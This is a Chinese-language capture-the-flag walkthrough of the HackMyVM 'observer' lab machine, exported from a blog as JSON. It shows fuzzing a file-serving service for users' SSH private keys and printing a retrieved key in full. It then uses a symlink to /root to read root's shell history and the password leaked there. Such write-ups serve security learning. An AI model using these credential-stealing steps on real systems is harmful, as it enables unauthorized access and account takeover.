{"id":567,"date":"2024-04-15T15:11:51","date_gmt":"2024-04-15T07:11:51","guid":{"rendered":"http:\/\/162.14.82.114\/?p=567"},"modified":"2024-04-15T15:11:51","modified_gmt":"2024-04-15T07:11:51","slug":"hmv-_-observer","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/567\/04\/15\/2024\/","title":{"rendered":"hmv[-_-]observer"},"content":{"rendered":"

observer<\/h1>\n

\"image-20240415142104501\"<\/div>
\n
\"image-20240415141920076\"<\/div><\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
rustscan -a 192.168.0.103 -- -A<\/code><\/pre>\n
Open 192.168.0.103:22\nOpen 192.168.0.103:3333\n\nPORT     STATE SERVICE    REASON  VERSION\n22\/tcp   open  ssh        syn-ack OpenSSH 9.2p1 Debian 2 (protocol 2.0)\n| ssh-hostkey: \n|   256 06:c9:a8:8a:1c:fd:9b:10:8f:cf:0b:1f:04:46:aa:07 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI3o4mI7uASKMmSXi1ktBAkiph60IX52JaKgbuS5hJtX2nGn8JIvaGZjT50iAGX7GdSd7O2uGU6whos6zh1OEMk=\n|   256 34:85:c5:fd:7b:26:c3:8b:68:a2:9f:4c:5c:66:5e:18 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP8MvYrFJd08kv8oTQLwj5p1yOEycvQQBFnStnx4Mred\n3333\/tcp open  dec-notes? syn-ack\n| fingerprint-strings: \n|   FourOhFourRequest: \n|     HTTP\/1.0 200 OK\n|     Date: Mon, 15 Apr 2024 06:22:30 GMT\n|     Content-Length: 105\n|     Content-Type: text\/plain; charset=utf-8\n|     OBSERVING FILE: \/home\/nice ports,\/Trinity.txt.bak NOT EXIST \n|     <!-- lgTeMaPEZQleQYhYzRyWJjPjzpfRFEHMV -->\n|   GenericLines, Help, Kerberos, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: \n|     HTTP\/1.1 400 Bad Request\n|     Content-Type: text\/plain; charset=utf-8\n|     Connection: close\n|     Request\n|   GetRequest: \n|     HTTP\/1.0 200 OK\n|     Date: Mon, 15 Apr 2024 06:22:05 GMT\n|     Content-Length: 78\n|     Content-Type: text\/plain; charset=utf-8\n|     OBSERVING FILE: \/home\/ NOT EXIST \n|     <!-- XVlBzgbaiCMRAjWwhTHctcuAxhxKQFHMV -->\n|   HTTPOptions: \n|     HTTP\/1.0 200 OK\n|     Date: Mon, 15 Apr 2024 06:22:05 GMT\n|     Content-Length: 78\n|     Content-Type: text\/plain; charset=utf-8\n|     OBSERVING FILE: \/home\/ NOT EXIST \n|_    <!-- DaFpLSjFbcXoEFfRsWxPLDnJObCsNVHMV -->\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port3333-TCP:V=7.94SVN%I=7%D=4\/15%Time=661CC781%P=x86_64-pc-linux-gnu%r\nSF:(GenericLines,67,"HTTP\/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x\nSF:20text\/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Ba\nSF:d\\x20Request")%r(LPDString,67,"HTTP\/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nCo\nSF:ntent-Type:\\x20text\/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\nSF:\\r\\n400\\x20Bad\\x20Request")%r(GetRequest,C3,"HTTP\/1\\.0\\x20200\\x20OK\\r\\n\nSF:Date:\\x20Mon,\\x2015\\x20Apr\\x202024\\x2006:22:05\\x20GMT\\r\\nContent-Length\nSF::\\x2078\\r\\nContent-Type:\\x20text\/plain;\\x20charset=utf-8\\r\\n\\r\\nOBSERVI\nSF:NG\\x20FILE:\\x20\/home\/\\x20NOT\\x20EXIST\\x20\\n\\n\\n<!--\\x20XVlBzgbaiCMRAjWw\nSF:hTHctcuAxhxKQFHMV\\x20-->")%r(HTTPOptions,C3,"HTTP\/1\\.0\\x20200\\x20OK\\r\\n\nSF:Date:\\x20Mon,\\x2015\\x20Apr\\x202024\\x2006:22:05\\x20GMT\\r\\nContent-Length\nSF::\\x2078\\r\\nContent-Type:\\x20text\/plain;\\x20charset=utf-8\\r\\n\\r\\nOBSERVI\nSF:NG\\x20FILE:\\x20\/home\/\\x20NOT\\x20EXIST\\x20\\n\\n\\n<!--\\x20DaFpLSjFbcXoEFfR\nSF:sWxPLDnJObCsNVHMV\\x20-->")%r(RTSPRequest,67,"HTTP\/1\\.1\\x20400\\x20Bad\\x2\nSF:0Request\\r\\nContent-Type:\\x20text\/plain;\\x20charset=utf-8\\r\\nConnection\nSF::\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request")%r(Help,67,"HTTP\/1\\.1\\x20400\\x\nSF:20Bad\\x20Request\\r\\nContent-Type:\\x20text\/plain;\\x20charset=utf-8\\r\\nCo\nSF:nnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request")%r(SSLSessionReq,67,"H\nSF:TTP\/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text\/plain;\\x20ch\nSF:arset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request")%r(Te\nSF:rminalServerCookie,67,"HTTP\/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Ty\nSF:pe:\\x20text\/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\\nSF:x20Bad\\x20Request")%r(TLSSessionReq,67,"HTTP\/1\\.1\\x20400\\x20Bad\\x20Requ\nSF:est\\r\\nContent-Type:\\x20text\/plain;\\x20charset=utf-8\\r\\nConnection:\\x20\nSF:close\\r\\n\\r\\n400\\x20Bad\\x20Request")%r(Kerberos,67,"HTTP\/1\\.1\\x20400\\x2\nSF:0Bad\\x20Request\\r\\nContent-Type:\\x20text\/plain;\\x20charset=utf-8\\r\\nCon\nSF:nection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request")%r(FourOhFourRequest,DF\nSF:,"HTTP\/1\\.0\\x20200\\x20OK\\r\\nDate:\\x20Mon,\\x2015\\x20Apr\\x202024\\x2006:22\nSF::30\\x20GMT\\r\\nContent-Length:\\x20105\\r\\nContent-Type:\\x20text\/plain;\\x2\nSF:0charset=utf-8\\r\\n\\r\\nOBSERVING\\x20FILE:\\x20\/home\/nice\\x20ports,\/Trinit\nSF:y\\.txt\\.bak\\x20NOT\\x20EXIST\\x20\\n\\n\\n<!--\\x20lgTeMaPEZQleQYhYzRyWJjPjzp\nSF:fRFEHMV\\x20-->");\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n
\u8e29\u70b9<\/h3>\n
http:\/\/192.168.0.103:3333\/<\/code><\/pre>\n
OBSERVING FILE: \/home\/ NOT EXIST \n\n<!-- KJyiXJrscctNswYNsGRussVmaozFZBHMV --><\/code><\/pre>\n
fuzz<\/h3>\n
\u770b\u6765\u662f\u9ed8\u8ba4\u5728home<\/code>\u4e0b\u4e86\uff0c\u5c1d\u8bd5fuzz\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/observer]\n\u2514\u2500$ locate username \n.........\n\/usr\/share\/postgresql\/16\/extension\/insert_username--1.0.sql\n\/usr\/share\/postgresql\/16\/extension\/insert_username.control\n\/usr\/share\/seclists\/Usernames\/cirt-default-usernames.txt\n\/usr\/share\/seclists\/Usernames\/mssql-usernames-nansh0u-guardicore.txt\n\/usr\/share\/seclists\/Usernames\/sap-default-usernames.txt\n\/usr\/share\/seclists\/Usernames\/top-usernames-shortlist.txt\n\/usr\/share\/seclists\/Usernames\/xato-net-10-million-usernames-dup.txt\n\/usr\/share\/seclists\/Usernames\/xato-net-10-million-usernames.txt\n<\/code><\/pre>\n
ffuf -w \/usr\/share\/seclists\/Usernames\/xato-net-10-million-usernames.txt -u http:\/\/192.168.0.103:3333\/FUZZ\/.ssh\/id_rsa -fw 8 \n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/observer]\n\u2514\u2500$ ffuf -w \/usr\/share\/seclists\/Usernames\/xato-net-10-million-usernames.txt -u http:\/\/192.168.0.103:3333\/FUZZ\/.ssh\/id_rsa -fw 8 \n\n        \/'___\\  \/'___\\           \/'___\\       \n       \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/       \n       \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\      \n        \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/      \n         \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\       \n          \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/       \n\n       v2.1.0-dev\n________________________________________________\n\n :: Method           : GET\n :: URL              : http:\/\/192.168.0.103:3333\/FUZZ\/.ssh\/id_rsa\n :: Wordlist         : FUZZ: \/usr\/share\/seclists\/Usernames\/xato-net-10-million-usernames.txt\n :: Follow redirects : false\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 40\n :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter           : Response words: 8\n________________________________________________\n\njan                     [Status: 200, Size: 2602, Words: 7, Lines: 39, Duration: 1ms]\nMarc%20Ludlum           [Status: 200, Size: 101, Words: 9, Lines: 4, Duration: 14ms]\nCLEVER%20S              [Status: 200, Size: 98, Words: 9, Lines: 4, Duration: 8ms]\nbudrick%20              [Status: 200, Size: 98, Words: 9, Lines: 4, Duration: 3ms]\nMarc%20Ludlum2000       [Status: 200, Size: 105, Words: 9, Lines: 4, Duration: 7ms]\nwigfc\/                  [Status: 301, Size: 53, Words: 3, Lines: 3, Duration: 2ms]\nwblake25\/               [Status: 301, Size: 56, Words: 3, Lines: 3, Duration: 0ms]\ntuffy\/                  [Status: 301, Size: 53, Words: 3, Lines: 3, Duration: 2ms]\nthe%20fall              [Status: 200, Size: 98, Words: 9, Lines: 4, Duration: 9ms]\nsoupy1\/                 [Status: 301, Size: 54, Words: 3, Lines: 3, Duration: 2ms]\nsamuelvw%20             [Status: 200, Size: 99, Words: 9, Lines: 4, Duration: 4ms]\nsah1273%20              [Status: 200, Size: 98, Words: 9, Lines: 4, Duration: 7ms]\nrude%20dog              [Status: 200, Size: 98, Words: 9, Lines: 4, Duration: 7ms]\npeter5%20               [Status: 200, Size: 97, Words: 9, Lines: 4, Duration: 8ms]\npaul%20aston            [Status: 200, Size: 100, Words: 9, Lines: 4, Duration: 3ms]\npatrice\/                [Status: 301, Size: 55, Words: 3, Lines: 3, Duration: 1ms]\nmandwee%20              [Status: 200, Size: 98, Words: 9, Lines: 4, Duration: 4ms]\nmail%20to               [Status: 200, Size: 97, Words: 9, Lines: 4, Duration: 3ms]\nlarry%20vanni           [Status: 200, Size: 101, Words: 9, Lines: 4, Duration: 0ms]\nlO9ye\/                  [Status: 301, Size: 53, Words: 3, Lines: 3, Duration: 8ms]\n[WARN] Caught keyboard interrupt (Ctrl-C)<\/code><\/pre>\n
ssh -i \u767b\u5f55<\/h3>\n
\u5c1d\u8bd5\u8bbf\u95ee\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/observer]\n\u2514\u2500$ curl http:\/\/192.168.0.103:3333\/jan\/.ssh\/id_rsa \n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEA6Tzy2uBhFIRLYnINwYIinc+8TqNZap0CB7Ol3HSnBK9Ba9pGOSMT\nXy2J8eReFlni3MD5NYpgmA67cJAP3hjL9hDSZK2UaE0yXH4TijjCwy7C4TGlW49M8Mz7b1\nLsH5BDUWZKyHG\/YRhazCbslVkrVFjK9kxhWrt1inowgv2Ctn4kQWDPj1gPesFOjLUMPxv8\nfHoutqwKKMcZ37qePzd7ifP2wiCxlypu0d2z17vblgGjI249E9Aa+\/hKHOBc6ayJtwAXwc\nivKmNrJyrSLKo+xIgjF5uV0grej1XM\/bXjv39Z8XF9h4FEnsfzUN4MmL+g8oclsaO5wgax\n5X3Avamch\/vNK3kiQO2qTS1fRZU6T7O9tII3NmYDh00RcpIZCEAztSsos6c1BUoj6Rap+K\ns1DZQzamQva7y4Grit+UmP0APtA0vZ\/vVpqZ+259CXcYvuxuOhBYycEdLHVEFrKD4Fy6QE\nkC27Xv6ySoyTvWtL1VxCzbeA461p0U0hvpkPujDHAAAFiHjTdqp403aqAAAAB3NzaC1yc2\nEAAAGBAOk88trgYRSES2JyDcGCIp3PvE6jWWqdAgezpdx0pwSvQWvaRjkjE18tifHkXhZZ\n4tzA+TWKYJgOu3CQD94Yy\/YQ0mStlGhNMlx+E4o4wsMuwuExpVuPTPDM+29S7B+QQ1FmSs\nhxv2EYWswm7JVZK1RYyvZMYVq7dYp6MIL9grZ+JEFgz49YD3rBToy1DD8b\/Hx6LrasCijH\nGd+6nj83e4nz9sIgsZcqbtHds9e725YBoyNuPRPQGvv4ShzgXOmsibcAF8HIrypjaycq0i\nyqPsSIIxebldIK3o9VzP21479\/WfFxfYeBRJ7H81DeDJi\/oPKHJbGjucIGseV9wL2pnIf7\nzSt5IkDtqk0tX0WVOk+zvbSCNzZmA4dNEXKSGQhAM7UrKLOnNQVKI+kWqfirNQ2UM2pkL2\nu8uBq4rflJj9AD7QNL2f71aamftufQl3GL7sbjoQWMnBHSx1RBayg+BcukBJAtu17+skqM\nk71rS9VcQs23gOOtadFNIb6ZD7owxwAAAAMBAAEAAAGAJcJ6RrkgvmOUmMGCPJvG4umowM\nptRXdZxslsxr4T9AwzeTSDPejR0AzdUk34dYHj2n1bWzGl5bgs3FJWX0yAaLvcc\/QuHJyy\n1IqMu0npLhQ59J9G+AXBHRLyedlg5NNEMr9ux\/iyVRPOT1LV5m\/jNeqSIUHIWRoUM3EIvY\nwxRz4wvGzh7YECMItvHhSJgQYU4Eofme9MTcG+DJx31iAzXegjQNZuKdzyyAMuhHSjXiux\nr6C\/Pp\/oXnaZ+QbRw\/rsmZZhm1kpFwnC5QWLllWjUhYIyhzgkxeN+ELerf4VcRdXpR+9HO\nDMTQf7xjAsDWAF23pS3jf4GSGM53LOvzvJ8GV8zFYZJeX02eiwn4GiY2lbAM01TAPsvM7e\nRbp9\/U9wt7vpRJETHAQusQkQmxo+h6PztzdkNw0oszhY\/IIusReYH5wJRtbQu7Eb0iu+HS\n\/AM7EEWQ8aG576LuXU2d4kjEQCyE3XqtisuteuHXW6\/xX85fnuPovRYyx8e8j6Oo8RAAAA\nwEhOxtgacCvsSrdBGNGif6\/2k8rPnpp0QLitTclIrckQIBjYxKef7i+GHjBIUoyYLkwGDO\nfWApUSugEzxVX3VyhkIHaiDi+7Ijy2GuAHQO1WsN4gS3xv9oMNjiA27dTvkSYx6SCFeCYX\nt5BuyKDzk82rWj2U7HxkMrmuIdSSPy8Kev1I2A973qyDaV0GrSUDEPa3Hs6IZKpYOrA+aD\n4WTrp2E74BG0Py+TaBra9QZe6DlopEtK01+n8k5uw1fa8CLAAAAMEA9p0hlgVu1qYY8MFa\nJxNh2PsuLkRpxBd+gbQX+PSCHDsVx8NoD5YVdUlnr7Ysgubo8krNfJCYgfMRHRT\/2WAJk2\nU5mtYFUYwgCK4ITPC9IzVnRB1hcrrHD58rDSZV3B5gLyUSHgzB+GiNujym+95UrA644iE1\n0umTs7tKEuZzmFiJBBUL+q97+1Qhx6XiIVJs1gbPLmNI6SlXcVh25UHP2DUU+gPpc6Gjsj\nvquxbDcGtcvp+OgiHK6haNLqXbNbyrAAAAwQDyHX3sMMhbZEou35XxlOSNIOO6ijXyomx1\npvHApbImNyvIN49+b3mHfahKJp1n7cbsl0ypNSSaCPZp7iEdKzFHsxEuOIb0UyRBwgRmXw\nzz2MKT58znZbqXibrawxCg7SEwHL6Z\/IOfymgRnTehk0RrTkn1S1ZJaO+Zx0o09\/O\/dLwu\nNkCnFoC0qz0G5Box7EOPENbPHaq6CDefWciYzy1yrADOdqUSlnGtS\/TK1tBfgzZbwL4C6c\nU+OPQBwGQPpFUAAAAMamFuQG9ic2VydmVyAQIDBAUGBw==\n-----END OPENSSH PRIVATE KEY-----\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/observer]\n\u2514\u2500$ wget http:\/\/192.168.0.103:3333\/jan\/.ssh\/id_rsa\n--2024-04-15 02:48:20--  http:\/\/192.168.0.103:3333\/jan\/.ssh\/id_rsa\nConnecting to 192.168.0.103:3333... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: unspecified [text\/plain]\nSaving to: \u2018id_rsa\u2019\n\nid_rsa                                    [ <=>                                                                      ]   2.54K  --.-KB\/s    in 0s      \n\n2024-04-15 02:48:20 (215 MB\/s) - \u2018id_rsa\u2019 saved [2602]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/observer]\n\u2514\u2500$ chmod 600 id_rsa                              \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/observer]\n\u2514\u2500$ ssh jan@192.168.0.103 -i id_rsa \nThe authenticity of host '192.168.0.103 (192.168.0.103)' can't be established.\nED25519 key fingerprint is SHA256:1DlVfPPtEPOsfNJWynWUBQaV6QyJptlKBRMCdyjuusg.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added '192.168.0.103' (ED25519) to the list of known hosts.\nLinux observer 6.1.0-11-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.38-4 (2023-08-08) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Mon Aug 21 20:21:22 2023 from 192.168.0.100\njan@observer:~$<\/code><\/pre>\n
\u62ff\u4e0b\u7528\u6237jan<\/code><\/p>\n
\u63d0\u6743<\/h2>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
jan@observer:~$ sudo -l\nMatching Defaults entries for jan on observer:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser jan may run the following commands on observer:\n    (ALL) NOPASSWD: \/usr\/bin\/systemctl -l status\njan@observer:~$ ls -la\ntotal 40\ndrwx------ 4 jan  jan  4096 ago 21  2023 .\ndrwxr-xr-x 3 root root 4096 ago 21  2023 ..\n-rw------- 1 jan  jan   133 ago 21  2023 .bash_history\n-rw-r--r-- 1 jan  jan   220 ago 21  2023 .bash_logout\n-rw-r--r-- 1 jan  jan  3526 ago 21  2023 .bashrc\ndrwxr-xr-x 3 jan  jan  4096 ago 21  2023 .local\n-rw-r--r-- 1 jan  jan   807 ago 21  2023 .profile\ndrwx------ 2 jan  jan  4096 ago 21  2023 .ssh\n-rw------- 1 jan  jan    24 ago 21  2023 user.txt\n-rw------- 1 jan  jan    54 ago 21  2023 .Xauthority\njan@observer:~$ cat user.txt\nHMVdDepYxsi8VSucdruB3P7\njan@observer:~$ sudo \/usr\/bin\/systemctl -l status\n\u25cf observer\n    State: running\n    Units: 235 loaded (incl. loaded aliases)\n     Jobs: 0 queued\n   Failed: 0 units\n    Since: Mon 2024-04-15 08:15:37 CEST; 34min ago\n  systemd: 252.12-1~deb12u1\n   CGroup: \/\n           \u251c\u2500init.scope\n           \u2502 \u2514\u25001 \/sbin\/init\n           \u251c\u2500system.slice\n           \u2502 \u251c\u2500cron.service\n           \u2502 \u2502 \u251c\u2500451 \/usr\/sbin\/cron -f\n           \u2502 \u2502 \u251c\u2500459 \/usr\/sbin\/CRON -f\n           \u2502 \u2502 \u251c\u2500467 \/bin\/sh -c \/opt\/observer\n           \u2502 \u2502 \u2514\u2500468 \/opt\/observer                 # \u6709\u732b\u817b\uff01\n           \u2502 \u251c\u2500dbus.service\n           \u2502 \u2502 \u2514\u2500452 \/usr\/bin\/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only\n           \u2502 \u251c\u2500ifup@enp0s3.service\n           \u2502 \u2502 \u2514\u2500415 dhclient -4 -v -i -pf \/run\/dhclient.enp0s3.pid -lf \/var\/lib\/dhcp\/dhclient.enp0s3.leases -I -df \/var\/lib\/dhcp\/dhclient6.enp0s3.leas>           \u2502 \u251c\u2500ssh.service\n           \u2502 \u2502 \u2514\u2500472 "sshd: \/usr\/sbin\/sshd -D [listener] 0 of 10-100 startups"\n           \u2502 \u251c\u2500system-getty.slice\n           \u2502 \u2502 \u2514\u2500getty@tty1.service\n           \u2502 \u2502   \u2514\u2500463 \/sbin\/agetty -o "-p -- \\\\u" --noclear - linux\n           \u2502 \u251c\u2500systemd-journald.service\n           \u2502 \u2502 \u2514\u2500206 \/lib\/systemd\/systemd-journald\n           \u2502 \u251c\u2500systemd-logind.service\n           \u2502 \u2502 \u2514\u2500460 \/lib\/systemd\/systemd-logind\n           \u2502 \u251c\u2500systemd-timesyncd.service\n           \u2502 \u2502 \u2514\u2500266 \/lib\/systemd\/systemd-timesyncd\n           \u2502 \u2514\u2500systemd-udevd.service\n           \u2502   \u2514\u2500udev\n           \u2502     \u2514\u2500237 \/lib\/systemd\/systemd-udevd\n           \u2514\u2500user.slice\n             \u2514\u2500user-1000.slice\n               \u251c\u2500session-3.scope\n               \u2502 \u251c\u2500531 "sshd: jan [priv]"\n               \u2502 \u251c\u2500546 "sshd: jan@pts\/0"\n               \u2502 \u251c\u2500547 -bash\n               \u2502 \u251c\u2500556 sudo \/usr\/bin\/systemctl -l status\n               \u2502 \u251c\u2500557 sudo \/usr\/bin\/systemctl -l status\n               \u2502 \u251c\u2500558 \/usr\/bin\/systemctl -l status\n               \u2502 \u2514\u2500559 less\n               \u2514\u2500user@1000.service\n                 \u2514\u2500init.scope\n                   \u251c\u2500534 \/lib\/systemd\/systemd --user\n                   \u2514\u2500536 "(sd-pam)"<\/code><\/pre>\n
\u8fd9\u6b21\u4e0d\u80fd\u76f4\u63a5\u8f93\u5165!\/bin\/bash<\/code>\u62ff\u4e0broot\u4e86\uff01<\/p>\n
\u4e0a\u9762\u7684\u641c\u96c6\u4fe1\u606f\u4e2d\u53d1\u73b0\u5b9a\u65f6\u4efb\u52a1\uff1a<\/p>\n
\/bin\/sh -c \/opt\/observer<\/code><\/pre>\n
\u770b\u4e00\u4e0b\u662f\u4e2a\u5565\uff1a<\/p>\n
jan@observer:\/opt$ file observer \nobserver: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, Go BuildID=_E9thk92IIYCZvNN3nMp\/723mDp4suP4oBkI9Ztww\/FPlVJZMU8XbDS3SsBTeA\/jXmNFAfWVvPiDjPPa-TB, not stripped\njan@observer:\/opt$ python3 -V\nPython 3.11.2\njan@observer:\/opt$ python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n192.168.0.143 - - [15\/Apr\/2024 08:57:05] "GET \/observer HTTP\/1.1" 200 -\n^C\nKeyboard interrupt received, exiting.<\/code><\/pre>\n
\u4f20\u8fc7\u6765\u4e86\uff0c\u4f46\u662f\u5206\u6790\u4e0d\u4e86\u3002\u3002\u3002\u3002\u53ea\u80fd\u60f3\u522b\u7684\u529e\u6cd5\u4e86\uff0c\u5c1d\u8bd5\u52a8\u6001\u94fe\u63a5\u4e00\u4e0broot\u7684\u79c1\u94a5\u8bd5\u8bd5\uff1f<\/p>\n
jan@observer:~$ pwd\n\/home\/jan\njan@observer:~$ ls\nuser.txt\njan@observer:~$ ln -s \/root\/.ssh\/id_rsa root\njan@observer:~$ ls -la\ntotal 40\ndrwx------ 4 jan  jan  4096 abr 15 09:01 .\ndrwxr-xr-x 3 root root 4096 ago 21  2023 ..\n-rw------- 1 jan  jan   133 ago 21  2023 .bash_history\n-rw-r--r-- 1 jan  jan   220 ago 21  2023 .bash_logout\n-rw-r--r-- 1 jan  jan  3526 ago 21  2023 .bashrc\ndrwxr-xr-x 3 jan  jan  4096 ago 21  2023 .local\n-rw-r--r-- 1 jan  jan   807 ago 21  2023 .profile\nlrwxrwxrwx 1 jan  jan    17 abr 15 09:01 root -> \/root\/.ssh\/id_rsa\ndrwx------ 2 jan  jan  4096 ago 21  2023 .ssh\n-rw------- 1 jan  jan    24 ago 21  2023 user.txt\n-rw------- 1 jan  jan    54 ago 21  2023 .Xauthority<\/code><\/pre>\n
\u5c1d\u8bd5\u8bfb\u53d6\u4e00\u4e0b\uff0c\u53d1\u73b0\u4e0d\u884c\uff0c\u5c1d\u8bd5\u94fe\u63a5\u5230.ssh<\/code>\u76ee\u5f55\uff1a<\/p>\n
jan@observer:~$ ln -s \/root\/.ssh\/id_rsa .ssh\/root\njan@observer:~$ cd .ssh\njan@observer:~\/.ssh$ ls -la\ntotal 20\ndrwx------ 2 jan jan 4096 abr 15 09:03 .\ndrwx------ 4 jan jan 4096 abr 15 09:01 ..\n-rw-r--r-- 1 jan jan  566 ago 21  2023 authorized_keys\n-rw------- 1 jan jan 2602 ago 21  2023 id_rsa\n-rw-r--r-- 1 jan jan  566 ago 21  2023 id_rsa.pub\nlrwxrwxrwx 1 jan jan   17 abr 15 09:03 root -> \/root\/.ssh\/id_rsa<\/code><\/pre>\n
http:\/\/192.168.0.103:3333\/jan\/.ssh\/root<\/code><\/pre>\n
OBSERVING FILE: \/home\/jan\/.ssh\/root NOT EXIST \n\n<!-- AdIYseMCpRlovFGjLTTvOlrEaEcmbmHMV --><\/code><\/pre>\n
\u7ee7\u7eed\u5c1d\u8bd5\uff1a<\/p>\n
jan@observer:~$ ln -s \/root root\nln: fallo al crear el enlace simb\u00f3lico 'root': El fichero ya existe\njan@observer:~$ rm root\njan@observer:~$ ln -s \/root root<\/code><\/pre>\n
\"image-20240415150623521\"<\/div><\/p>\n
\u4f46\u662f\u5176\u4ed6\u76ee\u5f55\u5c31\u662f\u4e0d\u884c\u3002\u3002\u3002<\/p>\n
\u7ee7\u7eed\u5c1d\u8bd5\uff0c\u5fc5\u987b\u62ff\u5230rootshell\uff01\uff01\uff01<\/p>\n
http:\/\/192.168.0.103:3333\/jan\/root\/.bash_history<\/code><\/pre>\n
ip a\nexit\napt-get update && apt-get upgrade\napt-get install sudo\ncd\nwget https:\/\/go.dev\/dl\/go1.12.linux-amd64.tar.gz\ntar -C \/usr\/local -xzf go1.12.linux-amd64.tar.gz\nrm go1.12.linux-amd64.tar.gz \nexport PATH=$PATH:\/usr\/local\/go\/bin\nnano observer.go\ngo build observer.go \nmv observer \/opt\nls -l \/opt\/observer \ncrontab -e\nnano root.txt\nchmod 600 root.txt \nnano \/etc\/sudoers\nnano \/etc\/ssh\/sshd_config\npaswd\nfuck1ng0bs3rv3rs\npasswd\nsu jan\nnano \/etc\/issue\nnano \/etc\/network\/interfaces\nls -la\nexit\nls -la\ncat .bash_history\nls -la\nls -la\ncat .bash_history\nls -l\ncat root.txt \ncd \/home\/jan\nls -la\ncat user.txt \nsu jan\nreboot\nshutdown -h now<\/code><\/pre>\n
\u627e\u5230\u5bc6\u7801\uff0c\u5207\u6362\u7528\u6237\uff1a<\/p>\n
jan@observer:~$ ln -s \/root root\njan@observer:~$ su -l root\nContrase\u00f1a: \nroot@observer:~# ls -la\ntotal 52\ndrwx------  5 root root 4096 abr 15 08:50 .\ndrwxr-xr-x 18 root root 4096 ago 21  2023 ..\n-rw-------  1 root root  633 ago 21  2023 .bash_history\n-rw-r--r--  1 root root  571 abr 10  2021 .bashrc\ndrwxr-xr-x  3 root root 4096 ago 21  2023 .cache\n-rw-------  1 root root   38 abr 15 08:50 .lesshst\ndrwxr-xr-x  3 root root 4096 ago 21  2023 .local\n-rw-r--r--  1 root root  913 ago 21  2023 observer.go\n-rw-r--r--  1 root root  161 jul  9  2019 .profile\n-rw-------  1 root root   24 ago 21  2023 root.txt\n-rw-r--r--  1 root root   66 ago 21  2023 .selected_editor\ndrwx------  2 root root 4096 ago 21  2023 .ssh\n-rw-r--r--  1 root root  161 ago 21  2023 .wget-hsts\nroot@observer:~# cd .ssh\nroot@observer:~\/.ssh# ls -la\ntotal 8\ndrwx------ 2 root root 4096 ago 21  2023 .\ndrwx------ 5 root root 4096 abr 15 08:50 ..\nroot@observer:~\/.ssh# cd ..\nroot@observer:~# cat root.txt \nHMVb6MPDxdYLLC3sxNLIOH1<\/code><\/pre>\n
\u6211\u8bf4\u548b\u4e00\u76f4\u641c\u4e0d\u5230\uff0c\u539f\u6765\u662f\u6ca1\u6709\u3002\u3002\u3002\u3002\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"
